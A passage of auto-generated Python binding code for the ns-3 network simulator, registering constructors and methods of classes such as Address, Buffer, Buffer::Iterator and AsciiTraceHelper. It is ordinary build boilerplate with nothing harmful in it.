register_Ns3PbbMessageIpv4_methods(root_module, root_module['ns3::PbbMessageIpv4'])
register_Ns3PbbMessageIpv6_methods(root_module, root_module['ns3::PbbMessageIpv6'])
register_Ns3PbbPacket_methods(root_module, root_module['ns3::PbbPacket'])
register_Ns3PbbTlv_methods(root_module, root_module['ns3::PbbTlv'])
register_Ns3RandomVariableChecker_methods(root_module, root_module['ns3::RandomVariableChecker'])
register_Ns3RandomVariableValue_methods(root_module, root_module['ns3::RandomVariableValue'])
register_Ns3RateErrorModel_methods(root_module, root_module['ns3::RateErrorModel'])
register_Ns3ReceiveListErrorModel_methods(root_module, root_module['ns3::ReceiveListErrorModel'])
register_Ns3SimpleChannel_methods(root_module, root_module['ns3::SimpleChannel'])
register_Ns3SimpleNetDevice_methods(root_module, root_module['ns3::SimpleNetDevice'])
register_Ns3TimeChecker_methods(root_module, root_module['ns3::TimeChecker'])
register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker'])
register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue'])
register_Ns3PbbAddressTlv_methods(root_module, root_module['ns3::PbbAddressTlv'])
return
def register_Ns3Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## address.h (module 'network'): ns3::Address::Address() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor]
cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor]
cls.add_constructor([param('ns3::Address const &', 'address')])
## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function]
cls.add_method('CheckCompatible',
'bool',
[param('uint8_t', 'type'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyAllFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function]
cls.add_method('CopyAllTo',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'uint32_t',
[param('uint8_t *', 'buffer')],
is_const=True)
## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'buffer')])
## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function]
cls.add_method('GetLength',
'uint8_t',
[],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function]
cls.add_method('IsInvalid',
'bool',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function]
cls.add_method('IsMatchingType',
'bool',
[param('uint8_t', 'type')],
is_const=True)
## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function]
cls.add_method('Register',
'uint8_t',
[],
is_static=True)
## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'buffer')],
is_const=True)
return
def register_Ns3ApplicationContainer_methods(root_module, cls):
## application-container.h (module 'network'): ns3::ApplicationContainer::ApplicationContainer(ns3::ApplicationContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ApplicationContainer const &', 'arg0')])
## application-container.h (module 'network'): ns3::ApplicationContainer::ApplicationContainer() [constructor]
cls.add_constructor([])
## application-container.h (module 'network'): ns3::ApplicationContainer::ApplicationContainer(ns3::Ptr<ns3::Application> application) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Application >', 'application')])
## application-container.h (module 'network'): ns3::ApplicationContainer::ApplicationContainer(std::string name) [constructor]
cls.add_constructor([param('std::string', 'name')])
## application-container.h (module 'network'): void ns3::ApplicationContainer::Add(ns3::ApplicationContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::ApplicationContainer', 'other')])
## application-container.h (module 'network'): void ns3::ApplicationContainer::Add(ns3::Ptr<ns3::Application> application) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::Application >', 'application')])
## application-container.h (module 'network'): void ns3::ApplicationContainer::Add(std::string name) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name')])
## application-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Application>*,std::vector<ns3::Ptr<ns3::Application>, std::allocator<ns3::Ptr<ns3::Application> > > > ns3::ApplicationContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Application > const, std::vector< ns3::Ptr< ns3::Application > > >',
[],
is_const=True)
## application-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Application>*,std::vector<ns3::Ptr<ns3::Application>, std::allocator<ns3::Ptr<ns3::Application> > > > ns3::ApplicationContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Application > const, std::vector< ns3::Ptr< ns3::Application > > >',
[],
is_const=True)
## application-container.h (module 'network'): ns3::Ptr<ns3::Application> ns3::ApplicationContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::Application >',
[param('uint32_t', 'i')],
is_const=True)
## application-container.h (module 'network'): uint32_t ns3::ApplicationContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
## application-container.h (module 'network'): void ns3::ApplicationContainer::Start(ns3::Time start) [member function]
cls.add_method('Start',
'void',
[param('ns3::Time', 'start')])
## application-container.h (module 'network'): void ns3::ApplicationContainer::Stop(ns3::Time stop) [member function]
cls.add_method('Stop',
'void',
[param('ns3::Time', 'stop')])
return
def register_Ns3AsciiTraceHelper_methods(root_module, cls):
## trace-helper.h (module 'network'): ns3::AsciiTraceHelper::AsciiTraceHelper(ns3::AsciiTraceHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AsciiTraceHelper const &', 'arg0')])
## trace-helper.h (module 'network'): ns3::AsciiTraceHelper::AsciiTraceHelper() [constructor]
cls.add_constructor([])
## trace-helper.h (module 'network'): ns3::Ptr<ns3::OutputStreamWrapper> ns3::AsciiTraceHelper::CreateFileStream(std::string filename, std::_Ios_Openmode filemode=std::ios_base::out) [member function]
cls.add_method('CreateFileStream',
'ns3::Ptr< ns3::OutputStreamWrapper >',
[param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode', default_value='std::ios_base::out')])
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultDequeueSinkWithContext(ns3::Ptr<ns3::OutputStreamWrapper> file, std::string context, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultDequeueSinkWithContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('std::string', 'context'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultDequeueSinkWithoutContext(ns3::Ptr<ns3::OutputStreamWrapper> file, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultDequeueSinkWithoutContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultDropSinkWithContext(ns3::Ptr<ns3::OutputStreamWrapper> file, std::string context, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultDropSinkWithContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('std::string', 'context'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultDropSinkWithoutContext(ns3::Ptr<ns3::OutputStreamWrapper> file, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultDropSinkWithoutContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultEnqueueSinkWithContext(ns3::Ptr<ns3::OutputStreamWrapper> file, std::string context, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultEnqueueSinkWithContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('std::string', 'context'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultEnqueueSinkWithoutContext(ns3::Ptr<ns3::OutputStreamWrapper> file, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultEnqueueSinkWithoutContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultReceiveSinkWithContext(ns3::Ptr<ns3::OutputStreamWrapper> file, std::string context, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultReceiveSinkWithContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('std::string', 'context'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultReceiveSinkWithoutContext(ns3::Ptr<ns3::OutputStreamWrapper> file, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultReceiveSinkWithoutContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): std::string ns3::AsciiTraceHelper::GetFilenameFromDevice(std::string prefix, ns3::Ptr<ns3::NetDevice> device, bool useObjectNames=true) [member function]
cls.add_method('GetFilenameFromDevice',
'std::string',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'useObjectNames', default_value='true')])
## trace-helper.h (module 'network'): std::string ns3::AsciiTraceHelper::GetFilenameFromInterfacePair(std::string prefix, ns3::Ptr<ns3::Object> object, uint32_t interface, bool useObjectNames=true) [member function]
cls.add_method('GetFilenameFromInterfacePair',
'std::string',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::Object >', 'object'), param('uint32_t', 'interface'), param('bool', 'useObjectNames', default_value='true')])
return
def register_Ns3AsciiTraceHelperForDevice_methods(root_module, cls):
## trace-helper.h (module 'network'): ns3::AsciiTraceHelperForDevice::AsciiTraceHelperForDevice(ns3::AsciiTraceHelperForDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AsciiTraceHelperForDevice const &', 'arg0')])
## trace-helper.h (module 'network'): ns3::AsciiTraceHelperForDevice::AsciiTraceHelperForDevice() [constructor]
cls.add_constructor([])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, ns3::Ptr<ns3::NetDevice> nd, bool explicitFilename=false) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'nd'), param('bool', 'explicitFilename', default_value='false')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Ptr<ns3::NetDevice> nd) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Ptr< ns3::NetDevice >', 'nd')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, std::string ndName, bool explicitFilename=false) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('std::string', 'ndName'), param('bool', 'explicitFilename', default_value='false')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, std::string ndName) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('std::string', 'ndName')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, ns3::NetDeviceContainer d) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('ns3::NetDeviceContainer', 'd')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::NetDeviceContainer d) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::NetDeviceContainer', 'd')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, ns3::NodeContainer n) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('ns3::NodeContainer', 'n')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::NodeContainer n) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::NodeContainer', 'n')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, uint32_t nodeid, uint32_t deviceid, bool explicitFilename) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('uint32_t', 'nodeid'), param('uint32_t', 'deviceid'), param('bool', 'explicitFilename')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, uint32_t nodeid, uint32_t deviceid) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('uint32_t', 'nodeid'), param('uint32_t', 'deviceid')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAsciiAll(std::string prefix) [member function]
cls.add_method('EnableAsciiAll',
'void',
[param('std::string', 'prefix')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAsciiAll(ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function]
cls.add_method('EnableAsciiAll',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAsciiInternal(ns3::Ptr<ns3::OutputStreamWrapper> stream, std::string prefix, ns3::Ptr<ns3::NetDevice> nd, bool explicitFilename) [member function]
cls.add_method('EnableAsciiInternal',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'nd'), param('bool', 'explicitFilename')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3Buffer_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Buffer() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize, bool initialize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(ns3::Buffer const & o) [copy constructor]
cls.add_constructor([param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtEnd(uint32_t end) [member function]
cls.add_method('AddAtEnd',
'bool',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(ns3::Buffer const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtStart(uint32_t start) [member function]
cls.add_method('AddAtStart',
'bool',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::Begin() const [member function]
cls.add_method('Begin',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Buffer',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFullCopy() const [member function]
cls.add_method('CreateFullCopy',
'ns3::Buffer',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::End() const [member function]
cls.add_method('End',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentEndOffset() const [member function]
cls.add_method('GetCurrentEndOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentStartOffset() const [member function]
cls.add_method('GetCurrentStartOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint8_t const * ns3::Buffer::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3BufferIterator_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator(ns3::Buffer::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')])
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size, uint32_t initialChecksum) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetDistanceFrom(ns3::Buffer::Iterator const & o) const [member function]
cls.add_method('GetDistanceFrom',
'uint32_t',
[param('ns3::Buffer::Iterator const &', 'o')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsEnd() const [member function]
cls.add_method('IsEnd',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsStart() const [member function]
cls.add_method('IsStart',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next() [member function]
cls.add_method('Next',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next(uint32_t delta) [member function]
cls.add_method('Next',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev() [member function]
cls.add_method('Prev',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev(uint32_t delta) [member function]
cls.add_method('Prev',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadLsbtohU16() [member function]
cls.add_method('ReadLsbtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadLsbtohU32() [member function]
cls.add_method('ReadLsbtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadLsbtohU64() [member function]
cls.add_method('ReadLsbtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadNtohU16() [member function]
cls.add_method('ReadNtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadNtohU32() [member function]
cls.add_method('ReadNtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadNtohU64() [member function]
cls.add_method('ReadNtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(ns3::Buffer::Iterator start, ns3::Buffer::Iterator end) [member function]
cls.add_method('Write',
'void',
[param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU16(uint16_t data) [member function]
cls.add_method('WriteHtolsbU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU32(uint32_t data) [member function]
cls.add_method('WriteHtolsbU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU64(uint64_t data) [member function]
cls.add_method('WriteHtolsbU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU16(uint16_t data) [member function]
cls.add_method('WriteHtonU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU32(uint32_t data) [member function]
cls.add_method('WriteHtonU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU64(uint64_t data) [member function]
cls.add_method('WriteHtonU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU64(uint64_t data) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data, uint32_t len) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data'), param('uint32_t', 'len')])
return
def register_Ns3ByteTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::ByteTagIterator(ns3::ByteTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::ByteTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator::Item ns3::ByteTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagIterator::Item',
[])
return
def register_Ns3ByteTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::Item::Item(ns3::ByteTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetEnd() const [member function]
cls.add_method('GetEnd',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetStart() const [member function]
cls.add_method('GetStart',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): void ns3::ByteTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::ByteTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3ByteTagList_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList() [constructor]
cls.add_constructor([])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList(ns3::ByteTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList const &', 'o')])
